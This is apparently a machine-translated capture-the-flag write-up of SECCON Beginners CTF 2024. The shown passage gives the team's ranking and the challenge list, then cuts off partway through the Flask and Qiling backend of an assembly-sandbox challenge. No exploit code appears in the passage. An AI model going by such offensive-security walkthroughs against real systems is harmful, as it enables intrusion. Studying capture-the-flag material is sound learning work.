{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-sec4b-2024-en","result":{"data":{"markdownRemark":{"id":"b92888a2-704c-5a29-92d6-d9e2b42f900b","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-sec4b-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in SECCON Beginners CTF 2024, held starting June 15, 2024, with the team 0nePadding.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4c29019c115db331c70a25fe7b215f66/cdef6/image-20240616143310658.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 27.500000000000004%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAxUlEQVQY05WQ2Q7CIBRE+f9/01SNiTEuT42lrWDpItvtWOiiib54kxOGbbgDOxxPSDY7rNYbJMl20HsI+UCovu/xbzHO88FA4i4khBDgvMCjUnGTiKLpP7Bw6Vd5T0uXQXv6YJrPDxLNEFjTtlE45yLe+2hkjMUt48No3vGnLwjnK1VHtDaw1sFYG01ZXpTRSGuN50DQo6HB+XKFqpuv/wya8xJpmqEoBcq7hFLNGHlsmRbGSH7pNOy7af5JSNZ23ZJuXn8BG8XVZ45Kz78AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4c29019c115db331c70a25fe7b215f66/8ac56/image-20240616143310658.webp 240w,\n/static/4c29019c115db331c70a25fe7b215f66/d3be9/image-20240616143310658.webp 480w,\n/static/4c29019c115db331c70a25fe7b215f66/e46b2/image-20240616143310658.webp 960w,\n/static/4c29019c115db331c70a25fe7b215f66/5231b/image-20240616143310658.webp 1163w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4c29019c115db331c70a25fe7b215f66/8ff5a/image-20240616143310658.png 240w,\n/static/4c29019c115db331c70a25fe7b215f66/e85cb/image-20240616143310658.png 480w,\n/static/4c29019c115db331c70a25fe7b215f66/d9199/image-20240616143310658.png 960w,\n/static/4c29019c115db331c70a25fe7b215f66/cdef6/image-20240616143310658.png 1163w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4c29019c115db331c70a25fe7b215f66/d9199/image-20240616143310658.png\"\n            alt=\"image-20240616143310658\"\n            title=\"image-20240616143310658\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>We finished in 16th place out of 962 teams.</p>\n<p>Last year we placed 35th, so this is our best result to date.</p>\n<p>This time I solved not only Rev challenges but also several Crypto and Pwn ones, so I’ll write a brief writeup.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#assemblerev\">assemble(Rev)</a></p>\n<ul>\n<li><a href=\"#setting-up-a-local-environment\">Setting Up a Local Environment</a></li>\n<li><a href=\"#stage-1-stage-2\">Stage 1, Stage 2</a></li>\n<li><a href=\"#stage-3\">Stage 3</a></li>\n<li><a href=\"#stage-4\">Stage 4</a></li>\n</ul>\n</li>\n<li><a href=\"#cha-ll-engerev\">cha-ll-enge(Rev)</a></li>\n<li>\n<p><a href=\"#constructrev\">construct(Rev)</a></p>\n<ul>\n<li><a href=\"#check-for-command-line-arguments\">Check for Command-Line Arguments</a></li>\n<li><a href=\"#validate-input-length-of-0x20-characters\">Validate Input Length of 0x20 Characters</a></li>\n<li><a href=\"#validate-input-two-characters-at-a-time\">Validate Input Two Characters at a Time</a></li>\n</ul>\n</li>\n<li><a href=\"#former-seccomprev\">former-seccomp(Rev)</a></li>\n<li><a href=\"#simpleoverflowpwn\">simpleoverflow(Pwn)</a></li>\n<li><a href=\"#simpleoverwritepwn\">simpleoverwrite(Pwn)</a></li>\n<li><a href=\"#pure-and-easypwn\">pure-and-easy(Pwn)</a></li>\n<li><a href=\"#safe-primecrypto\">Safe Prime(Crypto)</a></li>\n<li><a href=\"#mathcrypto\">math(Crypto)</a></li>\n<li><a href=\"#commentatormisc\">commentator(Misc)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"assemblerev\" style=\"position:relative;\"><a href=\"#assemblerev\" aria-label=\"assemblerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>assemble(Rev)</h2>\n<blockquote>\n<p>Write assembly code in Intel syntax and retrieve the contents of flag.txt!</p>\n</blockquote>\n<p>Accessing the provided URL launches a web application like this.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/76b3617e8f3a7b4bb8026a8313240a45/d56b5/image-20240616104309228.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 67.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB3klEQVQ4y6XSTU8TQRwG8CkxGlsE9mV2Z/a123bZ3XZpWhtDFAMp9oWXA/GACVw8+QG8oF/Akzc9EUw4ajx45K6Jn+vxP1uoVVEIHn5ps9l55pn/LGssN1GPM0g3hMElTMu5Fk7U+1J4eLu+hy/bz3G0OgLzghoU4YSwpT9lCZd4l7KdoGARQeKggTSMUXMjsKzVQZKuIMnahTjNESc5LfShUwPjd6bA4vwCFir3pirlCsrleSwZtmpYhx8Sahko9D8IIgjV0BJEFmxicgHbr6E13ke+czDV3j1Ea7RPjatg0vEhpAdOL6vdFZNwasOtGTbNTOdwsy423p3hyclXDD58w4B+h6ff0X9/BlFrgvG/DN0ohj5DPadNNWpx69FTsM4QLO+DrSibYK0NaDQmZp7fllo0CZOXugjUnQh3+weYe7AL1qVbvT8mWyh1BtBF8DOwWMjllYEaBd5Zf4ZSETieBPZ+CXSnR7rKRcPbdORSj4IopDh6d4i59uYkUDO08xbX+6BN26PQkJrOqkKXYbEpC6IRDI1uVTMJ/ydTs6BrNvRF/qclXoyO9XbewM1zkpDsxpxmCpO+XbZ6/AJrH4+w9unVzdDax59f4+HpS4i4AWZkdehp9P+SKgzh4AcMwZES5lYSOAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/76b3617e8f3a7b4bb8026a8313240a45/8ac56/image-20240616104309228.webp 240w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d3be9/image-20240616104309228.webp 480w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/e46b2/image-20240616104309228.webp 960w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/34ce3/image-20240616104309228.webp 1215w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/76b3617e8f3a7b4bb8026a8313240a45/8ff5a/image-20240616104309228.png 240w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/e85cb/image-20240616104309228.png 480w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d9199/image-20240616104309228.png 960w,\n/static/76b3617e8f3a7b4bb8026a8313240a45/d56b5/image-20240616104309228.png 1215w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/76b3617e8f3a7b4bb8026a8313240a45/d9199/image-20240616104309228.png\"\n            alt=\"image-20240616104309228\"\n            title=\"image-20240616104309228\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The backend of this application is implemented with the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> shutil\n<span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> uuid\n\n<span class=\"token keyword\">from</span> flask <span class=\"token keyword\">import</span> Flask<span class=\"token punctuation\">,</span> render_template<span class=\"token punctuation\">,</span> request<span class=\"token punctuation\">,</span> session<span class=\"token punctuation\">,</span> redirect\n<span class=\"token keyword\">from</span> qiling <span class=\"token keyword\">import</span> Qiling\n<span class=\"token keyword\">from</span> qiling<span class=\"token punctuation\">.</span>const <span class=\"token keyword\">import</span> QL_ARCH<span class=\"token punctuation\">,</span> QL_OS<span class=\"token punctuation\">,</span> QL_VERBOSE\n<span class=\"token keyword\">from</span> qiling<span class=\"token punctuation\">.</span>extensions <span class=\"token keyword\">import</span> pipe\n\n<span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> asm\n\napp <span class=\"token operator\">=</span> Flask<span class=\"token punctuation\">(</span>__name__<span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span>secret_key <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>urandom<span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"GET\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">index</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\"id\"</span> <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> session<span class=\"token punctuation\">:</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"1\"</span>\n    <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/reset\"</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"GET\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">reset</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"1\"</span>\n    <span class=\"token keyword\">return</span> redirect<span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token decorator annotation punctuation\">@app<span class=\"token punctuation\">.</span>route</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/\"</span><span class=\"token punctuation\">,</span> methods<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"POST\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">submit</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    code <span class=\"token operator\">=</span> request<span class=\"token punctuation\">.</span>form<span class=\"token punctuation\">[</span><span class=\"token string\">\"code\"</span><span class=\"token punctuation\">]</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Please input the code.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token string\">\";\"</span> <span class=\"token keyword\">in</span> code<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span><span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Please remove the semicolon.\"</span><span class=\"token punctuation\">)</span>\n    lines <span class=\"token operator\">=</span> code<span class=\"token punctuation\">.</span>splitlines<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>lines<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token number\">25</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            error<span class=\"token operator\">=</span><span class=\"token string\">\"Too many instructions. Please use less than 25 instructions.\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">for</span> line <span class=\"token keyword\">in</span> lines<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n            order <span class=\"token operator\">=</span> line<span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n            <span class=\"token keyword\">if</span> order <span class=\"token keyword\">not</span> <span class=\"token keyword\">in</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"mov\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"push\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"syscall\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n                    <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n                    <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n                    error<span class=\"token operator\">=</span><span class=\"token string\">\"Invalid instructions are included. Please use only mov, push, syscall.\"</span><span class=\"token punctuation\">,</span>\n                <span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">continue</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        asm_code <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">,</span> arch<span class=\"token operator\">=</span><span class=\"token string\">\"amd64\"</span><span class=\"token punctuation\">,</span> os<span class=\"token operator\">=</span><span class=\"token string\">\"linux\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> error<span class=\"token operator\">=</span><span class=\"token string\">\"Failed to assemble the code. Please check the code.\"</span>\n        <span class=\"token punctuation\">)</span>\n\n    <span class=\"token comment\"># Debug</span>\n    logpath <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token string\">\"logs\"</span><span class=\"token punctuation\">,</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\".log\"</span><span class=\"token punctuation\">)</span>\n    logf <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>logpath<span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n    logf<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>code <span class=\"token operator\">+</span> <span class=\"token string\">\"\\n\"</span> <span class=\"token operator\">*</span> <span class=\"token number\">2</span><span class=\"token punctuation\">)</span>\n    logf<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n    dirname <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    os<span class=\"token punctuation\">.</span>mkdir<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span><span class=\"token punctuation\">:</span>\n        f <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n        flag <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>environ<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    ql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n        code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n        rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n        archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n        ostype<span class=\"token operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n        verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEFAULT<span class=\"token punctuation\">,</span>\n        log_file<span class=\"token operator\">=</span>logpath<span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">)</span>\n\n    ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout <span class=\"token operator\">=</span> pipe<span class=\"token punctuation\">.</span>SimpleOutStream<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        ql<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n            <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n            <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            error<span class=\"token operator\">=</span><span class=\"token string\">\"Failed to execute the code. Please check the code.\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">)</span>\n\n    shutil<span class=\"token punctuation\">.</span>rmtree<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> ignore_errors<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        stdout<span class=\"token operator\">=</span>ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span> Exception<span class=\"token punctuation\">:</span>\n        stdout <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>os<span class=\"token punctuation\">.</span>stdout<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token number\">1024</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n    message <span class=\"token operator\">=</span> <span class=\"token string\">\"Successfully executed the code!\"</span>\n    <span class=\"token keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"1\"</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span><span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"2\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"2\"</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span> <span class=\"token keyword\">and</span> ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>stack_pop<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x123</span><span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"3\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"3\"</span> <span class=\"token keyword\">and</span> <span class=\"token string\">\"Hello\"</span> <span class=\"token keyword\">in</span> stdout<span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! Let's proceed to the next stage!\"</span>\n        session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"4\"</span>\n    <span class=\"token keyword\">elif</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span> <span class=\"token keyword\">and</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">in</span> stdout<span class=\"token punctuation\">:</span>\n        message <span class=\"token operator\">=</span> <span class=\"token string\">\"Congratulation! You have completed all stages!\"</span>\n\n    <span class=\"token keyword\">return</span> render_template<span class=\"token punctuation\">(</span>\n        <span class=\"token string\">\"index.html\"</span><span class=\"token punctuation\">,</span>\n        <span class=\"token builtin\">id</span><span class=\"token operator\">=</span>session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        message<span class=\"token operator\">=</span>message<span class=\"token punctuation\">,</span>\n        stdout<span class=\"token operator\">=</span>stdout<span class=\"token punctuation\">,</span>\n        rax<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rax\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rbx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rbx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rcx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rcx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rdx<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rdx\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rsi<span class=\"token 